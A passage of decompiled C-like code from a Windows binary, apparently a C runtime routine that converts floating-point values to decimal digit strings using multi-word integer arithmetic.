                                                    																 *(_t1271 + _t1248 * 4 - 0x1d0) = _t849 *  *(_t1271 + _t1248 * 4 - 0x1d0) + _t1199;
                                                    																_t849 = _v1896;
                                                    																asm("adc edx, 0x0");
                                                    																_t1248 = _t1248 + 1;
                                                    																_t1199 = _t1153;
                                                    																__eflags = _t1248 - _t1096;
                                                    															} while (_t1248 != _t1096);
                                                    															__eflags = _t1199;
                                                    															if(_t1199 != 0) {
                                                    																_t856 = _v472;
                                                    																__eflags = _t856 - 0x73;
                                                    																if(_t856 >= 0x73) {
                                                    																	goto L260;
                                                    																} else {
                                                    																	 *(_t1271 + _t856 * 4 - 0x1d0) = _t1199;
                                                    																	_v472 = _v472 + 1;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										} else {
                                                    											do {
                                                    												__eflags = _t812 - 0x26;
                                                    												if(_t812 > 0x26) {
                                                    													_t812 = 0x26;
                                                    												}
                                                    												_t1097 =  *(0xcf8346 + _t812 * 4) & 0x000000ff;
                                                    												_v1872 = _t812;
                                                    												_v1400 = ( *(0xcf8346 + _t812 * 4) & 0x000000ff) + ( *(0xcf8347 + _t812 * 4) & 0x000000ff);
                                                    												E00CDFFF0(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
                                                    												_t867 = E00CE0320( &(( &_v1396)[_t1097]), 0xcf7a40 + ( *(0xcf8344 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xcf8347 + _t812 * 4) & 0x000000ff) << 2);
                                                    												_t1098 = _v1400;
                                                    												_t1277 =  &(_t1277[6]);
                                                    												_v1892 = _t1098;
                                                    												__eflags = _t1098 - 1;
                                                    												if(_t1098 > 1) {
                                                    													__eflags = _v472 - 1;
                                                    													if(_v472 > 1) {
                                                    														__eflags = _t1098 - _v472;
                                                    														_t1202 =  &_v1396;
                                                    														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
                                                    														__eflags = _t868;
                                                    														if(_t868 != 0) {
                                                    															_t1154 =  &_v468;
                                                    														} else {
                                                    															_t1202 =  &_v468;
                                                    															_t1154 =  &_v1396;
                                                    														}
                                                    														_v1908 = _t1154;
                                                    														__eflags = _t868;
                                                    														if(_t868 == 0) {
                                                    															_t1098 = _v472;
                                                    														}
                                                    														_v1876 = _t1098;
                                                    														__eflags = _t868;
                                                    														if(_t868 != 0) {
                                                    															_v1892 = _v472;
                                                    														}
                                                    														_t1155 = 0;
                                                    														_t1250 = 0;
                                                    														_v1864 = 0;
                                                    														__eflags = _t1098;
                                                    														if(_t1098 == 0) {
                                                    															L243:
                                                    															_v472 = _t1155;
                                                    															_t870 = _t1155 << 2;
                                                    															__eflags = _t870;
                                                    															_push(_t870);
                                                    															_t871 =  &_v1860;
                                                    															goto L244;
                                                    														} else {
                                                    															_t1203 = _t1202 -  &_v1860;
                                                    															__eflags = _t1203;
                                                    															_v1928 = _t1203;
                                                    															do {
                                                    																_t878 =  *(_t1271 + _t1203 + _t1250 * 4 - 0x740);
                                                    																_v1896 = _t878;
                                                    																__eflags = _t878;
                                                    																if(_t878 != 0) {
                                                    																	_t879 = 0;
                                                    																	_t1204 = 0;
                                                    																	_t1099 = _t1250;
                                                    																	_v1888 = 0;
                                                    																	__eflags = _v1892;
                                                    																	if(_v1892 == 0) {
                                                    																		L240:
                                                    																		__eflags = _t1099 - 0x73;
                                                    																		if(_t1099 == 0x73) {
                                                    																			goto L258;
                                                    																		} else {
                                                    																			_t1203 = _v1928;
                                                    																			_t1098 = _v1876;
                                                    																			goto L242;
                                                    																		}
                                                    																	} else {
                                                    																		while(1) {
                                                    																			__eflags = _t1099 - 0x73;
                                                    																			if(_t1099 == 0x73) {
                                                    																				goto L235;
                                                    																			}
                                                    																			__eflags = _t1099 - _t1155;
                                                    																			if(_t1099 == _t1155) {
                                                    																				 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
                                                    																				_t891 = _t879 + 1 + _t1250;
                                                    																				__eflags = _t891;
                                                    																				_v1864 = _t891;
                                                    																				_t879 = _v1888;
                                                    																			}
                                                    																			_t886 =  *(_v1908 + _t879 * 4);
                                                    																			asm("adc edx, 0x0");
                                                    																			 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1204;
                                                    																			asm("adc edx, 0x0");
                                                    																			_t879 = _v1888 + 1;
                                                    																			_t1099 = _t1099 + 1;
                                                    																			_v1888 = _t879;
                                                    																			_t1204 = _t886 * _v1896 >> 0x20;
                                                    																			_t1155 = _v1864;
                                                    																			__eflags = _t879 - _v1892;
                                                    																			if(_t879 != _v1892) {
                                                    																				continue;
                                                    																			} else {
                                                    																				goto L235;
                                                    																			}
                                                    																			while(1) {
                                                    																				L235:
                                                    																				__eflags = _t1204;
                                                    																				if(_t1204 == 0) {
                                                    																					goto L240;
                                                    																				}
                                                    																				__eflags = _t1099 - 0x73;
                                                    																				if(_t1099 == 0x73) {
                                                    																					goto L258;
                                                    																				} else {
                                                    																					__eflags = _t1099 - _t1155;
                                                    																					if(_t1099 == _t1155) {
                                                    																						_t558 = _t1271 + _t1099 * 4 - 0x740;
                                                    																						 *_t558 =  *(_t1271 + _t1099 * 4 - 0x740) & 0x00000000;
                                                    																						__eflags =  *_t558;
                                                    																						_t564 = _t1099 + 1; // 0x1
                                                    																						_v1864 = _t564;
                                                    																					}
                                                    																					_t884 = _t1204;
                                                    																					_t1204 = 0;
                                                    																					 *(_t1271 + _t1099 * 4 - 0x740) =  *(_t1271 + _t1099 * 4 - 0x740) + _t884;
                                                    																					_t1155 = _v1864;
                                                    																					asm("adc edi, edi");
                                                    																					_t1099 = _t1099 + 1;
                                                    																					continue;
                                                    																				}
                                                    																				goto L246;
                                                    																			}
                                                    																			goto L240;
                                                    																		}
                                                    																		goto L235;
                                                    																	}
                                                    																} else {
                                                    																	__eflags = _t1250 - _t1155;
                                                    																	if(_t1250 == _t1155) {
                                                    																		 *(_t1271 + _t1250 * 4 - 0x740) =  *(_t1271 + _t1250 * 4 - 0x740) & _t878;
                                                    																		_t526 = _t1250 + 1; // 0x1
                                                    																		_t1155 = _t526;
                                                    																		_v1864 = _t1155;
                                                    																	}
                                                    																	goto L242;
                                                    																}
                                                    																goto L246;
                                                    																L242:
                                                    																_t1250 = _t1250 + 1;
                                                    																__eflags = _t1250 - _t1098;
                                                    															} while (_t1250 != _t1098);
                                                    															goto L243;
                                                    														}
                                                    													} else {
                                                    														_t1205 = _v468;
                                                    														_v472 = _t1098;
                                                    														E00CEBDE1( &_v468, _t1064,  &_v1396, _t1098 << 2);
                                                    														_t1277 =  &(_t1277[4]);
                                                    														__eflags = _t1205;
                                                    														if(_t1205 == 0) {
                                                    															goto L203;
                                                    														} else {
                                                    															__eflags = _t1205 - 1;
                                                    															if(_t1205 == 1) {
                                                    																goto L245;
                                                    															} else {
                                                    																__eflags = _v472;
                                                    																if(_v472 == 0) {
                                                    																	goto L245;
                                                    																} else {
                                                    																	_t1100 = 0;
                                                    																	_v1896 = _v472;
                                                    																	_t1251 = 0;
                                                    																	__eflags = 0;
                                                    																	do {
                                                    																		_t900 = _t1205;
                                                    																		_t1156 = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) >> 0x20;
                                                    																		 *(_t1271 + _t1251 * 4 - 0x1d0) = _t900 *  *(_t1271 + _t1251 * 4 - 0x1d0) + _t1100;
                                                    																		asm("adc edx, 0x0");
                                                    																		_t1251 = _t1251 + 1;
                                                    																		_t1100 = _t1156;
                                                    																		__eflags = _t1251 - _v1896;
                                                    																	} while (_t1251 != _v1896);
                                                    																	goto L208;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												} else {
                                                    													_t1206 = _v1396;
                                                    													__eflags = _t1206;
                                                    													if(_t1206 != 0) {
                                                    														__eflags = _t1206 - 1;
                                                    														if(_t1206 == 1) {
                                                    															goto L245;
                                                    														} else {
                                                    															__eflags = _v472;
                                                    															if(_v472 == 0) {
                                                    																goto L245;
                                                    															} else {
                                                    																_t1101 = 0;
                                                    																_v1896 = _v472;
                                                    																_t1252 = 0;
                                                    																__eflags = 0;
                                                    																do {
                                                    																	_t905 = _t1206;
                                                    																	_t1157 = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) >> 0x20;
                                                    																	 *(_t1271 + _t1252 * 4 - 0x1d0) = _t905 *  *(_t1271 + _t1252 * 4 - 0x1d0) + _t1101;
                                                    																	asm("adc edx, 0x0");
                                                    																	_t1252 = _t1252 + 1;
                                                    																	_t1101 = _t1157;
                                                    																	__eflags = _t1252 - _v1896;
                                                    																} while (_t1252 != _v1896);
                                                    																L208:
                                                    																__eflags = _t1100;
                                                    																if(_t1100 == 0) {
                                                    																	goto L245;
                                                    																} else {
                                                    																	_t903 = _v472;
                                                    																	__eflags = _t903 - 0x73;
                                                    																	if(_t903 >= 0x73) {
                                                    																		L258:
                                                    																		_v2408 = 0;
                                                    																		_v472 = 0;
                                                    																		E00CEBDE1( &_v468, _t1064,  &_v2404, 0);
                                                    																		_t1277 =  &(_t1277[4]);
                                                    																		_t874 = 0;
                                                    																	} else {
                                                    																		 *(_t1271 + _t903 * 4 - 0x1d0) = _t1100;
                                                    																		_v472 = _v472 + 1;
                                                    																		goto L245;
                                                    																	}
                                                    																}
                                                    															}
                                                    														}
                                                    													} else {
                                                    														L203:
                                                    														_v2408 = 0;
                                                    														_v472 = 0;
                                                    														_push(0);
                                                    														_t871 =  &_v2404;
                                                    														L244:
                                                    														_push(_t871);
                                                    														_push(_t1064);
                                                    														_push( &_v468);
                                                    														E00CEBDE1();
                                                    														_t1277 =  &(_t1277[4]);
                                                    														L245:
                                                    														_t874 = 1;
                                                    													}
                                                    												}
                                                    												L246:
                                                    												__eflags = _t874;
                                                    												if(_t874 == 0) {
                                                    													_v2408 = _v2408 & 0x00000000;
                                                    													_v472 = _v472 & 0x00000000;
                                                    													_push(0);
                                                    													L261:
                                                    													_push( &_v2404);
                                                    													_t852 =  &_v468;
                                                    													goto L262;
                                                    												} else {
                                                    													goto L247;
                                                    												}
                                                    												goto L263;
                                                    												L247:
                                                    												_t812 = _v1880 - _v1872;
                                                    												__eflags = _t812;
                                                    												_v1880 = _t812;
                                                    											} while (_t812 != 0);
                                                    											_t1085 = _v1884;
                                                    											goto L249;
                                                    										}
                                                    									} else {
                                                    										_t908 = _t810 / _t1084;
                                                    										_v1908 = _t908;
                                                    										_t1102 = _t810 % _t1084;
                                                    										_v1896 = _t1102;
                                                    										__eflags = _t908;
                                                    										if(_t908 == 0) {
                                                    											L184:
                                                    											__eflags = _t1102;
                                                    											if(_t1102 != 0) {
                                                    												_t1207 =  *(0xcf83dc + _t1102 * 4);
                                                    												__eflags = _t1207;
                                                    												if(_t1207 != 0) {
                                                    													__eflags = _t1207 - 1;
                                                    													if(_t1207 != 1) {
                                                    														_t909 = _v936;
                                                    														_v1896 = _t909;
                                                    														__eflags = _t909;
                                                    														if(_t909 != 0) {
                                                    															_t1253 = 0;
                                                    															_t1103 = 0;
                                                    															__eflags = 0;
                                                    															do {
                                                    																_t910 = _t1207;
                                                    																_t1161 = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) >> 0x20;
                                                    																 *(_t1271 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1271 + _t1103 * 4 - 0x3a0) + _t1253;
                                                    																asm("adc edx, 0x0");
                                                    																_t1103 = _t1103 + 1;
                                                    																_t1253 = _t1161;
                                                    																__eflags = _t1103 - _v1896;
                                                    															} while (_t1103 != _v1896);
                                                    															__eflags = _t1253;
                                                    															if(_t1253 != 0) {
                                                    																_t913 = _v936;
                                                    																__eflags = _t913 - 0x73;
                                                    																if(_t913 >= 0x73) {
                                                    																	goto L186;
                                                    																} else {
                                                    																	 *(_t1271 + _t913 * 4 - 0x3a0) = _t1253;
                                                    																	_v936 = _v936 + 1;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												} else {
                                                    													L186:
                                                    													_v2408 = 0;
                                                    													_v936 = 0;
                                                    													_push(0);
                                                    													goto L190;
                                                    												}
                                                    											}
                                                    										} else {
                                                    											do {
                                                    												__eflags = _t908 - 0x26;
                                                    												if(_t908 > 0x26) {
                                                    													_t908 = 0x26;
                                                    												}
                                                    												_t1104 =  *(0xcf8346 + _t908 * 4) & 0x000000ff;
                                                    												_v1888 = _t908;
                                                    												_v1400 = ( *(0xcf8346 + _t908 * 4) & 0x000000ff) + ( *(0xcf8347 + _t908 * 4) & 0x000000ff);
                                                    												E00CDFFF0(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
                                                    												_t926 = E00CE0320( &(( &_v1396)[_t1104]), 0xcf7a40 + ( *(0xcf8344 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xcf8347 + _t908 * 4) & 0x000000ff) << 2);
                                                    												_t1105 = _v1400;
                                                    												_t1277 =  &(_t1277[6]);
                                                    												_v1892 = _t1105;
                                                    												__eflags = _t1105 - 1;
                                                    												if(_t1105 > 1) {
                                                    													__eflags = _v936 - 1;
                                                    													if(_v936 > 1) {
                                                    														__eflags = _t1105 - _v936;
                                                    														_t1210 =  &_v1396;
                                                    														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
                                                    														__eflags = _t927;
                                                    														if(_t927 != 0) {
                                                    															_t1162 =  &_v932;
                                                    														} else {
                                                    															_t1210 =  &_v932;
                                                    															_t1162 =  &_v1396;
                                                    														}
                                                    														_v1876 = _t1162;
                                                    														__eflags = _t927;
                                                    														if(_t927 == 0) {
                                                    															_t1105 = _v936;
                                                    														}
                                                    														_v1880 = _t1105;
                                                    														__eflags = _t927;
                                                    														if(_t927 != 0) {
                                                    															_v1892 = _v936;
                                                    														}
                                                    														_t1163 = 0;
                                                    														_t1255 = 0;
                                                    														_v1864 = 0;
                                                    														__eflags = _t1105;
                                                    														if(_t1105 == 0) {
                                                    															L177:
                                                    															_v936 = _t1163;
                                                    															_t929 = _t1163 << 2;
                                                    															__eflags = _t929;
                                                    															goto L178;
                                                    														} else {
                                                    															_t1211 = _t1210 -  &_v1860;
                                                    															__eflags = _t1211;
                                                    															_v1928 = _t1211;
                                                    															do {
                                                    																_t937 =  *(_t1271 + _t1211 + _t1255 * 4 - 0x740);
                                                    																_v1884 = _t937;
                                                    																__eflags = _t937;
                                                    																if(_t937 != 0) {
                                                    																	_t938 = 0;
                                                    																	_t1212 = 0;
                                                    																	_t1106 = _t1255;
                                                    																	_v1872 = 0;
                                                    																	__eflags = _v1892;
                                                    																	if(_v1892 == 0) {
                                                    																		L174:
                                                    																		__eflags = _t1106 - 0x73;
                                                    																		if(_t1106 == 0x73) {
                                                    																			goto L187;
                                                    																		} else {
                                                    																			_t1211 = _v1928;
                                                    																			_t1105 = _v1880;
                                                    																			goto L176;
                                                    																		}
                                                    																	} else {
                                                    																		while(1) {
                                                    																			__eflags = _t1106 - 0x73;
                                                    																			if(_t1106 == 0x73) {
                                                    																				goto L169;
                                                    																			}
                                                    																			__eflags = _t1106 - _t1163;
                                                    																			if(_t1106 == _t1163) {
                                                    																				 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
                                                    																				_t950 = _t938 + 1 + _t1255;
                                                    																				__eflags = _t950;
                                                    																				_v1864 = _t950;
                                                    																				_t938 = _v1872;
                                                    																			}
                                                    																			_t945 =  *(_v1876 + _t938 * 4);
                                                    																			asm("adc edx, 0x0");
                                                    																			 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1212;
                                                    																			asm("adc edx, 0x0");
                                                    																			_t938 = _v1872 + 1;
                                                    																			_t1106 = _t1106 + 1;
                                                    																			_v1872 = _t938;
                                                    																			_t1212 = _t945 * _v1884 >> 0x20;
                                                    																			_t1163 = _v1864;
                                                    																			__eflags = _t938 - _v1892;
                                                    																			if(_t938 != _v1892) {
                                                    																				continue;
                                                    																			} else {
                                                    																				goto L169;
                                                    																			}
                                                    																			while(1) {
                                                    																				L169:
                                                    																				__eflags = _t1212;
                                                    																				if(_t1212 == 0) {
                                                    																					goto L174;
                                                    																				}
                                                    																				__eflags = _t1106 - 0x73;
                                                    																				if(_t1106 == 0x73) {
                                                    																					L187:
                                                    																					__eflags = 0;
                                                    																					_v2408 = 0;
                                                    																					_v936 = 0;
                                                    																					_push(0);
                                                    																					_t940 =  &_v2404;
                                                    																					goto L188;
                                                    																				} else {
                                                    																					__eflags = _t1106 - _t1163;
                                                    																					if(_t1106 == _t1163) {
                                                    																						_t370 = _t1271 + _t1106 * 4 - 0x740;
                                                    																						 *_t370 =  *(_t1271 + _t1106 * 4 - 0x740) & 0x00000000;
                                                    																						__eflags =  *_t370;
                                                    																						_t376 = _t1106 + 1; // 0x1
                                                    																						_v1864 = _t376;
                                                    																					}
                                                    																					_t943 = _t1212;
                                                    																					_t1212 = 0;
                                                    																					 *(_t1271 + _t1106 * 4 - 0x740) =  *(_t1271 + _t1106 * 4 - 0x740) + _t943;
                                                    																					_t1163 = _v1864;
                                                    																					asm("adc edi, edi");
                                                    																					_t1106 = _t1106 + 1;
                                                    																					continue;
                                                    																				}
                                                    																				goto L181;
                                                    																			}
                                                    																			goto L174;
                                                    																		}
                                                    																		goto L169;
                                                    																	}
                                                    																} else {
                                                    																	__eflags = _t1255 - _t1163;
                                                    																	if(_t1255 == _t1163) {
                                                    																		 *(_t1271 + _t1255 * 4 - 0x740) =  *(_t1271 + _t1255 * 4 - 0x740) & _t937;
                                                    																		_t338 = _t1255 + 1; // 0x1
                                                    																		_t1163 = _t338;
                                                    																		_v1864 = _t1163;
                                                    																	}
                                                    																	goto L176;
                                                    																}
                                                    																goto L181;
                                                    																L176:
                                                    																_t1255 = _t1255 + 1;
                                                    																__eflags = _t1255 - _t1105;
                                                    															} while (_t1255 != _t1105);
                                                    															goto L177;
                                                    														}
                                                    													} else {
                                                    														_t1213 = _v932;
                                                    														_v936 = _t1105;
                                                    														E00CEBDE1( &_v932, _t1064,  &_v1396, _t1105 << 2);
                                                    														_t1277 =  &(_t1277[4]);
                                                    														__eflags = _t1213;
                                                    														if(_t1213 != 0) {
                                                    															__eflags = _t1213 - 1;
                                                    															if(_t1213 == 1) {
                                                    																goto L180;
                                                    															} else {
                                                    																__eflags = _v936;
                                                    																if(_v936 == 0) {
                                                    																	goto L180;
                                                    																} else {
                                                    																	_t1107 = 0;
                                                    																	_v1884 = _v936;
                                                    																	_t1256 = 0;
                                                    																	__eflags = 0;
                                                    																	do {
                                                    																		_t958 = _t1213;
                                                    																		_t1164 = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) >> 0x20;
                                                    																		 *(_t1271 + _t1256 * 4 - 0x3a0) = _t958 *  *(_t1271 + _t1256 * 4 - 0x3a0) + _t1107;
                                                    																		asm("adc edx, 0x0");
                                                    																		_t1256 = _t1256 + 1;
                                                    																		_t1107 = _t1164;
                                                    																		__eflags = _t1256 - _v1884;
                                                    																	} while (_t1256 != _v1884);
                                                    																	goto L149;
                                                    																}
                                                    															}
                                                    														} else {
                                                    															_v1400 = 0;
                                                    															_v936 = 0;
                                                    															_push(0);
                                                    															_t930 =  &_v1396;
                                                    															goto L179;
                                                    														}
                                                    													}
                                                    												} else {
                                                    													_t1214 = _v1396;
                                                    													__eflags = _t1214;
                                                    													if(_t1214 != 0) {
                                                    														__eflags = _t1214 - 1;
                                                    														if(_t1214 == 1) {
                                                    															goto L180;
                                                    														} else {
                                                    															__eflags = _v936;
                                                    															if(_v936 == 0) {
                                                    																goto L180;
                                                    															} else {
                                                    																_t1108 = 0;
                                                    																_v1884 = _v936;
                                                    																_t1257 = 0;
                                                    																__eflags = 0;
                                                    																do {
                                                    																	_t965 = _t1214;
                                                    																	_t1165 = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) >> 0x20;
                                                    																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
                                                    																	asm("adc edx, 0x0");
                                                    																	_t1257 = _t1257 + 1;
                                                    																	_t1108 = _t1165;
                                                    																	__eflags = _t1257 - _v1884;
                                                    																} while (_t1257 != _v1884);
                                                    																L149:
                                                    																__eflags = _t1107;
                                                    																if(_t1107 == 0) {
                                                    																	goto L180;
                                                    																} else {
                                                    																	_t961 = _v936;
                                                    																	__eflags = _t961 - 0x73;
                                                    																	if(_t961 < 0x73) {
                                                    																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
                                                    																		_v936 = _v936 + 1;
                                                    																		goto L180;
                                                    																	} else {
                                                    																		_v1400 = 0;
                                                    																		_v936 = 0;
                                                    																		_push(0);
                                                    																		_t940 =  &_v1396;
                                                    																		L188:
                                                    																		_push(_t940);
                                                    																		_push(_t1064);
                                                    																		_push( &_v932);
                                                    																		E00CEBDE1();
                                                    																		_t1277 =  &(_t1277[4]);
                                                    																		_t933 = 0;
                                                    																	}
                                                    																}
                                                    															}
                                                    														}
                                                    													} else {
                                                    														_t929 = 0;
                                                    														_v1864 = 0;
                                                    														_v936 = 0;
                                                    														L178:
                                                    														_push(_t929);
                                                    														_t930 =  &_v1860;
                                                    														L179:
                                                    														_push(_t930);
                                                    														_push(_t1064);
                                                    														_push( &_v932);
                                                    														E00CEBDE1();
                                                    														_t1277 =  &(_t1277[4]);
                                                    														L180:
                                                    														_t933 = 1;
                                                    													}
                                                    												}
                                                    												L181:
                                                    												__eflags = _t933;
                                                    												if(_t933 == 0) {
                                                    													_v2408 = _v2408 & 0x00000000;
                                                    													_t404 =  &_v936;
                                                    													 *_t404 = _v936 & 0x00000000;
                                                    													__eflags =  *_t404;
                                                    													_push(0);
                                                    													L190:
                                                    													_push( &_v2404);
                                                    													_t852 =  &_v932;
                                                    													L262:
                                                    													_push(_t1064);
                                                    													_push(_t852);
                                                    													E00CEBDE1();
                                                    													_t1277 =  &(_t1277[4]);
                                                    												} else {
                                                    													goto L182;
                                                    												}
                                                    												goto L263;
                                                    												L182:
                                                    												_t908 = _v1908 - _v1888;
                                                    												__eflags = _t908;
                                                    												_v1908 = _t908;
                                                    											} while (_t908 != 0);
                                                    											_t1102 = _v1896;
                                                    											goto L184;
                                                    										}
                                                    									}
                                                    									L263:
                                                    									_t1194 = _v1920;
                                                    									_t1243 = _t1194;
                                                    									_t1086 = _v472;
                                                    									_v1872 = _t1243;
                                                    									__eflags = _t1086;
                                                    									if(_t1086 != 0) {
                                                    										_t1247 = 0;
                                                    										_t1198 = 0;
                                                    										__eflags = 0;
                                                    										do {
                                                    											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
                                                    											_t1151 = 0xa;
                                                    											_t1152 = _t841 * _t1151 >> 0x20;
                                                    											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
                                                    											asm("adc edx, 0x0");
                                                    											_t1198 = _t1198 + 1;
                                                    											_t1247 = _t1152;
                                                    											__eflags = _t1198 - _t1086;
                                                    										} while (_t1198 != _t1086);
                                                    										_v1896 = _t1247;
                                                    										__eflags = _t1247;
                                                    										_t1243 = _v1872;
                                                    										if(_t1247 != 0) {
                                                    											_t1095 = _v472;
                                                    											__eflags = _t1095 - 0x73;
                                                    											if(_t1095 >= 0x73) {
                                                    												__eflags = 0;
                                                    												_v2408 = 0;
                                                    												_v472 = 0;
                                                    												E00CEBDE1( &_v468, _t1064,  &_v2404, 0);
                                                    												_t1277 =  &(_t1277[4]);
                                                    											} else {
                                                    												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
                                                    												_v472 = _v472 + 1;
                                                    											}
                                                    										}
                                                    										_t1194 = _t1243;
                                                    									}
                                                    									_t815 = E00CED440( &_v472,  &_v936);
                                                    									_t1142 = 0xa;
                                                    									__eflags = _t815 - _t1142;
                                                    									if(_t815 != _t1142) {
                                                    										__eflags = _t815;
                                                    										if(_t815 != 0) {
                                                    											_t816 = _t815 + 0x30;
                                                    											__eflags = _t816;
                                                    											_t1243 = _t1194 + 1;
                                                    											 *_t1194 = _t816;
                                                    											_v1872 = _t1243;
                                                    											goto L282;
                                                    										} else {
                                                    											_t817 = _v1904 - 1;
                                                    										}
                                                    									} else {
                                                    										_v1904 = _v1904 + 1;
                                                    										_t1243 = _t1194 + 1;
                                                    										_t832 = _v936;
                                                    										 *_t1194 = 0x31;
                                                    										_v1872 = _t1243;
                                                    										__eflags = _t832;
                                                    										if(_t832 != 0) {
                                                    											_t1197 = 0;
                                                    											_t1246 = _t832;
                                                    											_t1094 = 0;
                                                    											__eflags = 0;
                                                    											do {
                                                    												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
                                                    												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
                                                    												asm("adc edx, 0x0");
                                                    												_t1094 = _t1094 + 1;
                                                    												_t1197 = _t833 * _t1142 >> 0x20;
                                                    												_t1142 = 0xa;
                                                    												__eflags = _t1094 - _t1246;
                                                    											} while (_t1094 != _t1246);
                                                    											_t1243 = _v1872;
                                                    											__eflags = _t1197;
                                                    											if(_t1197 != 0) {
                                                    												_t836 = _v936;
                                                    												__eflags = _t836 - 0x73;
                                                    												if(_t836 >= 0x73) {
                                                    													_v2408 = 0;
                                                    													_v936 = 0;
                                                    													E00CEBDE1( &_v932, _t1064,  &_v2404, 0);
                                                    													_t1277 =  &(_t1277[4]);
                                                    												} else {
                                                    													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
                                                    													_v936 = _v936 + 1;
                                                    												}
                                                    											}
                                                    										}
                                                    										L282:
                                                    										_t817 = _v1904;
                                                    									}
                                                    									 *((intOrPtr*)(_v1924 + 4)) = _t817;
                                                    									_t1070 = _v1916;
                                                    									__eflags = _t817;
                                                    									if(_t817 >= 0) {
                                                    										__eflags = _t1070 - 0x7fffffff;
                                                    										if(_t1070 <= 0x7fffffff) {
                                                    											_t1070 = _t1070 + _t817;
                                                    											__eflags = _t1070;
                                                    										}
                                                    									}
                                                    									_t819 = _a24 - 1;
                                                    									__eflags = _t819 - _t1070;
                                                    									if(_t819 >= _t1070) {
                                                    										_t819 = _t1070;
                                                    									}
                                                    									_t755 = _t819 + _v1920;
                                                    									_v1916 = _t755;
                                                    									__eflags = _t1243 - _t755;
                                                    									if(__eflags != 0) {
                                                    										while(1) {
                                                    											_t755 = _v472;
                                                    											__eflags = _t755;
                                                    											if(__eflags == 0) {
                                                    												goto L303;
                                                    											}
                                                    											_t1195 = 0;
                                                    											_t1244 = _t755;
                                                    											_t1090 = 0;
                                                    											__eflags = 0;
                                                    											do {
                                                    												_t820 =  *(_t1271 + _t1090 * 4 - 0x1d0);
                                                    												 *(_t1271 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1195;
                                                    												asm("adc edx, 0x0");
                                                    												_t1090 = _t1090 + 1;
                                                    												_t1195 = _t820 * 0x3b9aca00 >> 0x20;
                                                    												__eflags = _t1090 - _t1244;
                                                    											} while (_t1090 != _t1244);
                                                    											_t1245 = _v1872;
                                                    											__eflags = _t1195;
                                                    											if(_t1195 != 0) {
                                                    												_t826 = _v472;
                                                    												__eflags = _t826 - 0x73;
                                                    												if(_t826 >= 0x73) {
                                                    													__eflags = 0;
                                                    													_v2408 = 0;
                                                    													_v472 = 0;
                                                    													E00CEBDE1( &_v468, _t1064,  &_v2404, 0);
                                                    													_t1277 =  &(_t1277[4]);
                                                    												} else {
                                                    													 *(_t1271 + _t826 * 4 - 0x1d0) = _t1195;
                                                    													_v472 = _v472 + 1;
                                                    												}
                                                    											}
                                                    											_t825 = E00CED440( &_v472,  &_v936);
                                                    											_t1196 = 8;
                                                    											_t1070 = _v1916 - _t1245;
                                                    											__eflags = _t1070;
                                                    											do {
                                                    												_t708 = _t825 % _v1912;
                                                    												_t825 = _t825 / _v1912;
                                                    												_t1142 = _t708 + 0x30;
                                                    												__eflags = _t1070 - _t1196;
                                                    												if(_t1070 >= _t1196) {
                                                    													 *(_t1196 + _t1245) = _t1142;
                                                    												}
                                                    												_t1196 = _t1196 - 1;
                                                    												__eflags = _t1196 - 0xffffffff;
                                                    											} while (_t1196 != 0xffffffff);
                                                    											__eflags = _t1070 - 9;
                                                    											if(_t1070 > 9) {
                                                    												_t1070 = 9;
                                                    											}
                                                    											_t1243 = _t1245 + _t1070;
                                                    											_v1872 = _t1243;
                                                    											__eflags = _t1243 - _v1916;
                                                    											if(__eflags != 0) {
                                                    												continue;
                                                    											}
                                                    											goto L303;
                                                    										}
                                                    									}
                                                    									L303:
                                                    									 *_t1243 = 0;
                                                    									goto L309;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t1070 = _t1234 & 0x000fffff;
                                                    					if((_t1186 | _t1234 & 0x000fffff) != 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_push(0xcf8404);
                                                    						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                                                    						L308:
                                                    						_push(_a24);
                                                    						_push(_t1055);
                                                    						if(E00CE8D67() != 0) {
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							_push(0);
                                                    							E00CE9097();
                                                    							asm("int3");
                                                    							_push(0x10);
                                                    							E00CDF5F0(_t1055, _t1186, _t1234);
                                                    							_v32 = _v32 & 0x00000000;
                                                    							E00CEAC31(8);
                                                    							_t1071 = 0xcfc4e8;
                                                    							_t721 =  &_v8;
                                                    							 *_t721 = _v8 & 0x00000000;
                                                    							__eflags =  *_t721;
                                                    							_t1235 = 3;
                                                    							while(1) {
                                                    								_v36 = _t1235;
